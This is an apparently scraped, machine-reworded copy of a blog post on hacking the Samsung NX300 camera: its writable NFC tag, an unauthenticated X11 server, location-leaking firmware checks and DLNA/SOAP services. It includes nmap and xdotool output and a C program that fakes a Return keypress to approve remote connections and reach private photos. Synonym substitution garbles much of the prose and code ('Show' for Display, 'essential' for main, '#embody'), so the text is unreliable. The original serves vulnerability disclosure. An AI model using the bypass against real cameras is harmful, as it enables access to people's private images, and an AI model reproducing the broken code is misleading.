Now Reading
Hacking the Samsung NX300 ‘Good’ Digital camera

Hacking the Samsung NX300 ‘Good’ Digital camera

2023-04-03 17:32:46

Georg Lukas, 2014-05-07 18:45

The Samsung NX300
good digital camera is a middle-class mirrorless digital camera with NFC and WiFi
connectivity. You may join it along with your native WiFi community to add
on to cloud providers, share footage through
DLNA or
get hold of distant entry out of your smartphone. For the latter, the digital camera supplies
the Distant Viewfinder and MobileLink modes the place it creates an
unencrypted entry level with wide-open entry to its X server and any
knowledge which you’d anticipate solely to be obtainable to your smartphone.

As a result of {hardware} engineers suck at software program safety, nothing else was to be
anticipated. Nonetheless, the next will present how badly they suck, if solely
for documentation functions.

This put up is barely masking the community connectivity of the NX300.
Learn the follow-up posts for getting a root shell
and adding features to the camera.
The smartphone app deserves some consideration as properly. Be at liberty to do your personal
analysis and put up it to the
project wiki.

The findings on this weblog posts are primarily based on firmware model 1.31.

NFC Tag

The NFC “connectivity” is an
NTAG203
created by NXP, which is pre-programmed with an NDEF message to obtain and
launch the (horribly designed)
Samsung SMART CAMERA App
from Google Play, and to tell the app in regards to the entry level identify offered
by this particular person digital camera:

Sort: MIME: utility/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX

Sort: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious consumer can simply “hack” your digital camera by
rewriting its tag to obtain some evil app, or to open nasty hyperlinks in your
internet browser, merely by touching it with an NFC-enabled smartphone. This was
confirmed by changing the tag content material with an URL.

The deployed tag helps everlasting write-locking, so if a prankster
nerd, you may find yourself with a digital camera caught redirecting you to a hardcore
porn website.

WiFi Networking

You may configure the NX300 to enter your WiFi community, it is going to behave like a
common shopper with some open providers, like DLNA. Allow us to see what precisely is
supplied by performing a port scan:

megavolt:~# nmap -sS -O nx300

Beginning Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.native (192.168.0.147)
Host is up (0.0089s latency).
Not proven: 999 closed ports
PORT     STATE SERVICE
6000/tcp open  X11
MAC Handle: A0:21:95:**:**:** (Unknown)
No actual OS matches for host (If  what OS is operating on it, see http://nmap.org/submit/ ).

This scan was carried out whereas the “E-Mail” utility was open. In AllShare
Play
and MobileLink modes, 7676/tcp is opened as well as. Additional, in
Distant Viewfinder mode, the digital camera additionally opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Might that be true? For positive it’s
access-locked through TCP to forestall abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
mounted

georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Display 0: minimal 320 x 200, present 480 x 800, most 4480 x 4096
LVDS1 linked 480x800+0+0 (regular left inverted proper x axis y axis) 480mm x 800mm
   480x800        60.0*+
HDMI1 disconnected (regular left inverted proper x axis y axis)

georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; accomplished
Defaulting to go looking window identify, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)

Enlightenment Body
di-camera-app-nx300
Enlightenment Body
smart-wifi-app-nx300

Nope! That is actually an unprotected X server! It’s operating
Enlightenment! And we will even run apps on
it! However apart from displaying stuff on the digital camera the enjoyable appears very restricted:

NX300 xteddy

X11 Key Bindings

A brief investigation utilizing xev outlines that the bodily keys on the
digital camera physique are certain to X11 key occasions as follows:

On/Off XF86PowerOff (solely when turning off)
Scroll Wheel XF86ScrollUp / XF86ScrollDown
Direct Hyperlink XF86Mail
Mode Wheel F1 .. F10
Video Rec XF86WebCam
+/- XF86Reload
Menu Menu
Fn XF86HomePage
Keypad KP_Left .. KP_Down, KP_Enter
Play XF86Tools
Delete KP_Delete

WiFi Consumer: Firmware Replace Verify

When the digital camera goes on-line, it performs a firmware model verify.
First, it retrieves http://gld.samsungosp.com:

Request:

GET / HTTP/1.1
Content material-Sort: textual content/xml;charset=utf-8
Settle for: utility/x-shockwave-flash, utility/vnd.ms-excel, */*
Settle for-Language: ko
Person-Agent: Mozilla/4.0
Host: gld.samsungosp.com

Response:

HTTP/1.1 200 OK
Settle for-Ranges: bytes
Content material-Sort: textual content/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Final-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content material-Size: 7
Connection: keep-alive

200 OK

This actually seems like a no-op. However perhaps it is a backdoor to permit
for distant code execution? Who is aware of…

Then, a question to
http://ipv4.connman.net/online/status.html
returns an empty doc, however has your location knowledge (apparently
obtained from the IP) within the headers:

X-ConnMan-Standing: on-line
X-ConnMan-Consumer-IP: ###.###.##.###
X-ConnMan-Consumer-Handle: ###.###.##.###
X-ConnMan-Consumer-Continent: EU
X-ConnMan-Consumer-Nation: DE
X-ConnMan-Consumer-Area: ##
X-ConnMan-Consumer-Metropolis: ###### (my precise metropolis)
X-ConnMan-Consumer-Latitude: ##.166698
X-ConnMan-Consumer-Longitude: ##.666700
X-ConnMan-Consumer-Timezone: Europe/Berlin

Wow! They know the place I stay! At the very least they don’t transmit any distinctive identifiers with the question.

Because the final step, the digital camera is
asking for firmware versions
and will get redirected to an XML doc with the ChangeLog.

Recognized variations thus far:

WiFi Entry Level: UPnP/DLNA

Two of the on-camera apps (MobileLink, Distant Viewfinder) open an
unencrypted entry level named AP_SSC_NX300_0-XX:XX:XX (the place XX:XX:XX
is the machine a part of its MAC handle). Thankfully, Samsung’s engineers have been
good and added a consumer affirmation dialog to the digital camera UI, to forestall distant
abuse:

See Also

NX300 Access Confirmation

Sadly, this dialog is operating on a wide-open X server, so all we’d like
is to faux an KP_Return occasion (primarily based on an
example by bharathisubramanian),
and we will join with whichever shopper, stream a stay video or obtain all
the non-public footage from the SD card, relying on the enabled mode:

#embody <X11/Xlib.h>
#embody <X11/Intrinsic.h>
#embody <X11/extensions/XTest.h>
#embody <unistd.h>
/* Ship Pretend Key Occasion */
static void SendKey (Show * disp, KeySym keysym, KeySym modsym){
 KeyCode keycode = 0, modcode = 0;
 keycode = XKeysymToKeycode (disp, keysym);
 if (keycode == 0) return;
 XTestGrabControl (disp, True);
 /* Generate modkey press */
 if (modsym != 0) {
  modcode = XKeysymToKeycode(disp, modsym);
  XTestFakeKeyEvent (disp, modcode, True, 0);
 }
 /* Generate common key press and launch */
 XTestFakeKeyEvent (disp, keycode, True, 0);
 XTestFakeKeyEvent (disp, keycode, False, 0); 

 /* Generate modkey launch */
 if (modsym != 0)
  XTestFakeKeyEvent (disp, modcode, False, 0);

 XSync (disp, False);
 XTestGrabControl (disp, False);
}

/* Primary Perform */
int essential (){
 Show *disp = XOpenDisplay (NULL);
 sleep (1);
 /* Ship Return */
 SendKey (disp, XK_Return, 0);
}

DLNA Service: Distant Viewfinder

The DLNA service is exposing some digital camera options, that are queried and
utilized by the Android app. The machine’s pleasant identify is [Camera]NX300,
as will be queried through HTTP from http://nx300:7676/smp_2_:

<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
  <deviceType>urn:schemas-upnp-org:machine:MediaServer:1</deviceType>
  <friendlyName>[Camera]NX300</friendlyName>
  <producer>Samsung Electronics</producer>
  <manufacturerURL>http://www.samsung.com</manufacturerURL>
  <modelDescription>Samsung Digital camera DMS</modelDescription>
  <modelName>SP1</modelName>
  <modelNumber>1.0</modelNumber>
  <modelURL>http://www.samsung.com</modelURL>
  <serialNumber>20081113 Folderview</serialNumber>
  <sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
  <UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
  <serviceList>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
      <controlURL>/smp_4_</controlURL>
      <eventSubURL>/smp_5_</eventSubURL>
      <SCPDURL>/smp_3_</SCPDURL>
    </service>
    <service>
      <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
      <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
      <controlURL>/smp_7_</controlURL>
      <eventSubURL>/smp_8_</eventSubURL>
      <SCPDURL>/smp_6_</SCPDURL>
    </service>
  </serviceList>
  <sec:deviceID>
  </sec:deviceID>
</machine>

Extra SOAP providers are offered for altering settings like focus and
flash (/smp_3_):

Perform Arguments Outcome
GetSystemUpdateID Id
GetSearchCapabilities SearchCaps
GetSortCapabilities SortCaps
Browse ObjectID BrowseFlag
Filter
StartingIndex RequestedCount SortCriteria
Outcome NumberReturned
TotalMatches UpdateID
GetIP GETIPRESULT
GetInfomation GETINFORMATIONRESULT StreamUrl
SetResolution RESOLUTION
ZoomIN CURRENTZOOM
ZoomOUT CURRENTZOOM
MULTIAF AFSTATUS
AF AFSTATUS
setTouchAFOption TOUCH_AF_OPTION SET_OPTION_RESULT
touchAF AFPOSITION TOUCHAF_RESULT
AFRELEASE AFRELEASERESULT
ReleaseSelfTimer RELEASETIMER
Shot AFSHOTRESULT
ShotWithGPS GPSINFO AFSHOTRESULT
SetLED LEDTIME
SetFlash FLASHMODE
SetStreamQuality High quality

One other service is out there for image / video streaming (/smp_4_):

<?xml model="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/cleaning soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/cleaning soap/encoding/">
  <s:Physique>
    <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
    <GETINFORMATIONRESULT>
      <Resolutions>
        <Decision><Width>5472</Width><Peak>3648</Peak></Decision>
        <Decision><Width>1920</Width><Peak>1080</Peak></Decision>
      </Resolutions>
      <Flash>
        <Helps><Assist>off</Assist><Assist>auto</Assist></Helps>
        <Defaultflash>auto</Defaultflash>
      </Flash>
      <FlashDisplay>
        <Helps><Assist>off</Assist><Assist>auto</Assist></Helps>
        <CurrentFlashDisplay>off</CurrentFlashDisplay>
      </FlashDisplay>
      <ZoomInfo>
        <DefaultZoom>0</DefaultZoom>
        <MaxZoom>1</MaxZoom>
      </ZoomInfo>
      <AVAILSHOTS>289</AVAILSHOTS>
      <ROTATION>1</ROTATION>
      <StreamQuality>
        <High quality><Possibility>excessive</Possibility><Possibility>low</Possibility></High quality>
        <Default>excessive</Default>
      </StreamQuality>
    </GETINFORMATIONRESULT>
    <StreamUrl>
      <QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
      <QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
    </StreamUrl>
    </u:GetInfomationResponse>
  </s:Physique>
</s:Envelope>

After triggering the suitable instructions, a stay video stream needs to be obtainable
from http://nx300:7679/livestream.avi. Nevertheless, a quick try to get
some video with wget or mplayer failed.

The “supply code” package deal offered on
Samsung’s OSS Release Center is 834 MBytes
compressed and primarily incorporates three copies of the rootfs picture (400-500MB
every), after which some scripts. The precise construct root is hidden beneath the second
paper sheet hyperlink within the “Bulletins” column.

Additionally, there are Obamapics in
TIZEN/venture/NX300/picture/rootdir/decide/sd0/DCIM/100PHOTO.

The venture is constructed on an historical model of
Tizen, on which I’m no skilled. Any individual else
must take these things aside, make a correct construct atmosphere, or port
OpenWRT to it.

Comments on HN


Full sequence:

Source Link

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

2022 Blinking Robots.
WordPress by Doejo

Scroll To Top